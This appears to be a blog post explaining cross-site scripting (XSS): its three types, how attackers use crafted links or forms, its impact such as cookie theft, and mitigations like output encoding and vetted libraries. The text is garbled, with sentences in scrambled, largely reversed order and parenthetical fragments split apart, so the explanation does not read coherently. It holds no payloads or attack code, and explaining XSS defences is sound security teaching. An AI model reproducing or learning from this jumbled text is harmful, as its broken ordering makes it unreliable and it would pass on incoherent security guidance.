For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Study all expected communication protocols and data representations to determine the required encoding strategies. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Phases: Implementation Architecture and Design Understand the context in which your data will be used and the encoding that will be expected. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket. Phase: Architecture and Design Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. an attacker site or a malicious link sent via email), just simply view the web page containing the code. The unsuspecting user is not required to interact with any additional site/link (e.g. Examples of an attacker’s favorite targets often include message board posts, web mail messages, and web chat software. Persistent attacks occur when the malicious code is submitted to a web site where it’s stored for a period of time. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash. Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user’s browser and execute. In such a case, the form can be submitted automatically, without the victim’s knowledge (e.g. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. When an attacker gets a user’s browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user’s browser instance.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |